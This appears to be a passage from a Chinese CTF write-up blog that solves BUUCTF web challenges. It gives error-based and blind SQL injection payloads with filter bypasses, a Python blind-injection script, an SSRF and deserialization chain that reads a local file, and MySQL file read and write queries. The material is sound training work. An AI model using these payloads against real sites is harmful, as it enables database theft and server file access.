<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27;or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(&#x27;</span>geek<span class="string">&#x27;)),0x7e),1))or&#x27;</span></span><br><span class="line"><span class="comment"># 表 H4rDsq1</span></span><br></pre></td></tr></table></figure>

<p><strong>查列：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27;or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(&#x27;</span>geek<span class="string">&#x27;)),0x7e),1))or&#x27;</span></span><br><span class="line"><span class="comment"># 列 id,username,password</span></span><br></pre></td></tr></table></figure>

<p><strong>查数据：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27;or(updatexml(1,concat(0x7e,(select(group_concat(concat_ws(&#x27;</span>~<span class="string">&#x27;,username,password)))from(geek.H4rDsq1)),0x7e),1))or&#x27;</span></span><br><span class="line"><span class="comment"># flag 查不完全，使用 substr()函数，被过滤，使用 mid()，被过滤，使用</span></span><br><span class="line"><span class="comment"># left() 和 right()</span></span><br><span class="line">    </span><br><span class="line">a<span class="string">&#x27;or(updatexml(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1)),0x7e),1))or&#x27;</span> </span><br><span class="line"> </span><br><span class="line">a<span class="string">&#x27;or(updatexml(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1)),0x7e),1))or&#x27;</span> </span><br><span class="line"> </span><br><span class="line"><span class="comment">#得到 flag</span></span><br></pre></td></tr></table></figure>

<h2 id="5-1-总结"><a href="#5-1-总结" class="headerlink" title="5.1 总结"></a>5.1 总结</h2><p><strong>查不完全时可使用的函数：</strong></p>
<ul>
<li>substr()</li>
<li>left()</li>
<li>right()</li>
<li>substring()</li>
<li>mid()</li>
</ul>
<p><strong>当 条件 当中的 = 被过滤时，使用 like</strong></p>
<h1 id="六、-CISCN2019-华北赛区-Day2-Web1-Hack-World1"><a href="#六、-CISCN2019-华北赛区-Day2-Web1-Hack-World1" class="headerlink" title="六、[CISCN2019 华北赛区 Day2 Web1]Hack World1"></a>六、[CISCN2019 华北赛区 Day2 Web1]Hack World1</h1><p><strong>考点：SQL注入 之 盲注</strong></p>
<p>过滤了空格、/**/、and、#、or、没有过滤 |、&amp;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在判断数值型和字符串注入时还可以通过提交数学式的方式来判断，如提交&#x27;id=2/2&#x27;，如果字符型则返回id=2的结果，如果是数值型则返回id=1的结果。</span><br></pre></td></tr></table></figure>

<p>数字型注入</p>
<p><img src="https://i.loli.net/2021/06/01/O8KnEHQfsTSg69w.png" alt="image-20210601161839584"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">利用/*!union*/可以绕过对union的过滤</span><br></pre></td></tr></table></figure>

<p><strong>新的盲注手法：</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#例如：</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span>(length(database())<span class="operator">&gt;</span><span class="number">3</span>);</span><br></pre></td></tr></table></figure>

<p><strong>盲注脚本</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import <span class="type">time</span></span><br><span class="line">import re</span><br><span class="line">url<span class="operator">=</span><span class="string">&#x27;http://d0e648d5-1dd9-4eac-86c5-4dd5c8516203.node3.buuoj.cn/index.php&#x27;</span></span><br><span class="line">flag <span class="operator">=</span> <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="keyword">range</span>(<span class="number">1</span>,<span class="number">43</span>):</span><br><span class="line">    max <span class="operator">=</span> <span class="number">127</span></span><br><span class="line">    min <span class="operator">=</span> <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> <span class="keyword">range</span>(<span class="number">0</span>,<span class="number">127</span>):</span><br><span class="line">        s <span class="operator">=</span> (<span class="type">int</span>)((max<span class="operator">+</span>min)<span class="operator">/</span><span class="number">2</span>)</span><br><span class="line">        payload <span class="operator">=</span> <span class="string">&#x27;1^(ascii(substr((select(flag)from(flag)),&#x27;</span><span class="operator">+</span>str(i)<span class="operator">+</span><span class="string">&#x27;,1))&gt;&#x27;</span><span class="operator">+</span>str(s)<span class="operator">+</span><span class="string">&#x27;)&#x27;</span></span><br><span class="line">        r <span class="operator">=</span> requests.post(url,data <span class="operator">=</span> &#123;<span class="string">&#x27;id&#x27;</span>:payload&#125;)</span><br><span class="line">        time.sleep(<span class="number">0.005</span>)</span><br><span class="line">        if <span class="string">&#x27;Hello, glzjin wants a girlfriend.&#x27;</span> <span class="keyword">in</span> str(r.content):</span><br><span class="line">            max<span class="operator">=</span>s</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            min<span class="operator">=</span>s</span><br><span class="line">        if((max<span class="operator">-</span>min)<span class="operator">&lt;=</span><span class="number">1</span>):</span><br><span class="line">            flag<span class="operator">+</span><span class="operator">=</span>chr(max)</span><br><span class="line">            break</span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/04/dwPRmVWuDcf9U7F.png" alt="image-20210604182514642"></p>
<h1 id="七、-网鼎杯-2018-Fakebook1"><a href="#七、-网鼎杯-2018-Fakebook1" class="headerlink" title="七、[网鼎杯 2018]Fakebook1"></a>七、[网鼎杯 2018]Fakebook1</h1><p><strong>考点：SQL 注入 + SSRF + 序列化与反序列化</strong></p>
<p>Join 一下，Blog 必须是 链接类型的，参与成功之后去 Login 一下，进入到个人的博客界面，发现URL发生变化，存在注入点</p>
<p><img src="https://i.loli.net/2021/06/01/Eq21rYC9czNxWkV.png" alt="image-20210601163235812"></p>
<p>数字型注入，过滤了 <code>union select</code>，<code>/**/</code> 绕过</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">1<span class="comment">#</span></span><br><span class="line">1 order by 4<span class="comment">#</span></span><br><span class="line">1 union/**/select 1,2,3,4<span class="comment">#</span></span><br><span class="line">-1 union/**/select 1,database(),3,4<span class="comment">#</span></span><br><span class="line"><span class="comment"># 数据库 fakebook </span></span><br><span class="line"></span><br><span class="line">-1 union/**/select 1,(select group_concat(table_name) from information_schema.tables <span class="built_in">where</span> table_schema = <span class="string">&#x27;fakebook&#x27;</span>),3,4<span class="comment">#</span></span><br><span class="line"><span class="comment"># 表 users </span></span><br><span class="line">	</span><br><span class="line">-1 union/**/select 1,(select group_concat(column_name) from information_schema.columns <span class="built_in">where</span> table_schema = <span class="string">&#x27;fakebook&#x27;</span>),3,4<span class="comment">#</span></span><br><span class="line"><span class="comment"># 列 no,username,passwd,data 	</span></span><br><span class="line"></span><br><span class="line">-1 union/**/select 1,(select group_concat(concat_ws(<span class="string">&#x27;~&#x27;</span>,username,passwd)) from fakebook.users),3,4<span class="comment">#</span></span><br><span class="line"><span class="comment"># 查到的是刚刚用户添加的账号以及密码，没有管理员的</span></span><br><span class="line"></span><br><span class="line">-1 union/**/select 1,(select group_concat(no) from fakebook.users),3,4<span class="comment">#</span></span><br><span class="line"><span class="comment"># 1,2</span></span><br><span class="line"></span><br><span class="line">-1 union/**/select 1,(select group_concat(data) from fakebook.users),3,4<span class="comment">#</span></span><br><span class="line"><span class="comment">#内容如下</span></span><br></pre></td></tr></table></figure>

<p>查到的 data 内容如下，是刚刚我注册的账号进行序列化之后的内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:8:<span class="string">&quot;UserInfo&quot;</span>:3:&#123;s:4:<span class="string">&quot;name&quot;</span>;s:2:<span class="string">&quot;xi&quot;</span>;s:3:<span class="string">&quot;age&quot;</span>;i:18;s:4:<span class="string">&quot;blog&quot;</span>;s:6:<span class="string">&quot;xi.com&quot;</span>;&#125;,O:8:<span class="string">&quot;UserInfo&quot;</span>:3:&#123;s:4:<span class="string">&quot;name&quot;</span>;s:2:<span class="string">&quot;qq&quot;</span>;s:3:<span class="string">&quot;age&quot;</span>;i:18;s:4:<span class="string">&quot;blog&quot;</span>;s:6:<span class="string">&quot;xi.com&quot;</span>;&#125; </span><br></pre></td></tr></table></figure>

<p><strong>存在 robots.txt</strong></p>
<p><img src="https://i.loli.net/2021/06/01/EJWYtcpiwO6dAIz.png" alt="image-20210601165157216"></p>
<p>下载备份文件，源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">UserInfo</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$age</span> = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$blog</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$name</span>, <span class="variable">$age</span>, <span class="variable">$blog</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;name = <span class="variable">$name</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;age = (<span class="keyword">int</span>)<span class="variable">$age</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;blog = <span class="variable">$blog</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">//初始化一个新的cURL会话并获取一个网页</span></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">get</span>(<span class="params"><span class="variable">$url</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">//初始化一个 curl会话，即创建一个新的 curl 资源</span></span><br><span class="line">        <span class="variable">$ch</span> = curl_init();</span><br><span class="line">		<span class="comment">//设置 URL和相应的选项</span></span><br><span class="line">        curl_setopt(<span class="variable">$ch</span>, CURLOPT_URL, <span class="variable">$url</span>);</span><br><span class="line">        curl_setopt(<span class="variable">$ch</span>, CURLOPT_RETURNTRANSFER, <span class="number">1</span>);</span><br><span class="line">        <span class="comment">//执行 curl会话，即抓取URL并将它传递给浏览器</span></span><br><span class="line">        <span class="variable">$output</span> = curl_exec(<span class="variable">$ch</span>);</span><br><span class="line">        <span class="variable">$httpCode</span> = curl_getinfo(<span class="variable">$ch</span>, CURLINFO_HTTP_CODE);</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$httpCode</span> == <span class="number">404</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="number">404</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">//关闭Curl资源，并且释放系统资源</span></span><br><span class="line">        curl_close(<span class="variable">$ch</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$output</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getBlogContents</span> (<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;get(<span class="keyword">$this</span>-&gt;blog);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">isValidBlog</span> (<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable">$blog</span> = <span class="keyword">$this</span>-&gt;blog;</span><br><span class="line">        <span class="keyword">return</span> preg_match(<span class="string">&quot;/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]&#123;2,6&#125;(\:[0-9]+)?(\/\S*)?$/i&quot;</span>, <span class="variable">$blog</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>流程：当用户创建一个新的账号时，就输入了一些信息，其中包括Blog，它被要求是一个链接，并且从上面的源码当中可以看到它的值是做了一些过滤的，当用户成功登陆近期之后，点击自己的博客链接会看到用户最开始所输入的信息内容，以下图的方式显示。</p>
<p><img src="https://i.loli.net/2021/06/01/ayiD38FoxrjJnPw.png" alt="image-20210601172250837"></p>
<p>然后 <code>get($url)</code> 函数将我们的页面传给浏览器，即存在 SSRF；</p>
<p>而我们进行SQL注入之后发现的 data 数据很显然是将用户输入的信息内容进行序列化之后保存的，<strong>可以理解为：它将用户输入的信息进行序列化存储到数据库的data字段中，而后又进行反序列化才将内容显示到浏览器的页面当中。</strong>也就是说，它会对用户输入的内容进行解析</p>
<p>对该页面源码查看，可以看到，它将我们的Blog内容传到了 <code>&lt;iframe&gt;</code> 中，</p>
<p><img src="https://i.loli.net/2021/06/01/YB9PSmUqflzEnOD.png" alt="image-20210601172557569"></p>
<p>构造</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-<span class="number">1</span> union<span class="comment">/**/</span>select <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="string">&#x27;O:8:&quot;UserInfo&quot;:3:&#123;s:4:&quot;name&quot;;s:2:&quot;xi&quot;;s:3:&quot;age&quot;;i:18;s:4:&quot;blog&quot;;s:29:&quot;file:///var/www/html/flag.php&quot;;&#125;&#x27;</span><span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p>查看源码之后，点击链接获得 flag</p>
<p><img src="https://i.loli.net/2021/06/01/7GRX3Y2ZFA8sOdK.png" alt="image-20210601173352864"></p>
<p>**另一种解法：没有过滤 load_file() **</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">-1</span> <span class="keyword">union</span><span class="comment">/**/</span><span class="keyword">select</span> <span class="number">1</span>,load_file(<span class="string">&#x27;/var/www/html/flag.php&#x27;</span>),<span class="number">3</span>,<span class="number">4</span>#</span><br></pre></td></tr></table></figure>

<h2 id="7-1-总结：Mysql-对文件的操作"><a href="#7-1-总结：Mysql-对文件的操作" class="headerlink" title="7.1 总结：Mysql 对文件的操作"></a>7.1 总结：Mysql 对文件的操作</h2><ul>
<li>load_file()</li>
<li>load data infile()</li>
<li>system cat</li>
</ul>
<p><strong>使用条件：1. 有File权限（File_priv的值）；2. secure_file_priv 的值不为 NULL</strong></p>
<p>注：&gt;=5.7.16默认值为NULL，&lt;5.7.16则为空</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#查看 File_priv</span><br><span class="line"><span class="keyword">select</span> File_priv <span class="keyword">from</span> mysql.user <span class="keyword">where</span> <span class="keyword">user</span><span class="operator">=</span><span class="string">&#x27;root&#x27;</span> <span class="keyword">and</span> host <span class="operator">=</span><span class="string">&#x27;localhost&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/01/DcqRGnP48OB7kW9.png" alt="image-20210601180220996"></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#查看 secure_file_priv</span><br><span class="line"><span class="keyword">show</span> <span class="keyword">global</span> variables <span class="keyword">like</span> &quot;secure_file_priv&quot;;</span><br><span class="line">值是 <span class="keyword">NULL</span> <span class="comment">--- 不允许文件导入导出操作</span></span><br><span class="line">值是 空   <span class="comment">--- 不对mysql的导入导出操作做出限制</span></span><br><span class="line">值是 具体路径 限制mysql的导入与导出操作限制在指定路径下</span><br><span class="line">#修改</span><br><span class="line"># Windows 下</span><br><span class="line">修改 mysql.ini 文件 （secure_file_priv <span class="operator">=</span>）</span><br><span class="line"># Linux 下</span><br><span class="line">在<span class="operator">/</span>etc<span class="operator">/</span>my.cnf的[mysqld]下面添加<span class="keyword">local</span><span class="operator">-</span>infile<span class="operator">=</span><span class="number">0</span>选项</span><br></pre></td></tr></table></figure>

<p><strong>读取文件</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># load_file()</span><br><span class="line"><span class="keyword">select</span> load_file(<span class="string">&#x27;D:/test.txt&#x27;</span>);</span><br><span class="line"></span><br><span class="line"># load data infile()</span><br><span class="line"># 利用该函数读文件时需要将文件内容保存至一个表中</span><br><span class="line"><span class="keyword">create</span> <span class="keyword">table</span> test(content text);</span><br><span class="line">load data infile <span class="string">&#x27;D:\\test.txt&#x27;</span> <span class="keyword">into</span> <span class="keyword">table</span> test;</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> test;	</span><br></pre></td></tr></table></figure>

<p><strong>写入文件</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">into</span> outfile <span class="string">&#x27;D:\\users.txt&#x27;</span> <span class="keyword">from</span> users;</span><br></pre></td></tr></table></figure>

<h1 id="八、-网鼎杯-2020-青龙组-AreUSerialz1"><a href="#八、-网鼎杯-2020-青龙组-AreUSerialz1" class="headerlink" title="八、[网鼎杯 2020 青龙组]AreUSerialz1"></a>八、[网鼎杯 2020 青龙组]AreUSerialz1</h1><p><strong>考点：序列化与反序列化，private、public、protected 序列化区别</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileHandler</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$op</span>;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$filename</span>;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$content</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="variable">$op</span> = <span class="string">&quot;1&quot;</span>;</span><br><span class="line">        <span class="variable">$filename</span> = <span class="string">&quot;/tmp/tmpfile&quot;</span>;</span><br><span class="line">        <span class="variable">$content</span> = <span class="string">&quot;Hello World!&quot;</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;process();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">process</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op == <span class="string">&quot;1&quot;</span>) &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;write();</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op == <span class="string">&quot;2&quot;</span>) &#123;</span><br><span class="line">            <span class="variable">$res</span> = <sp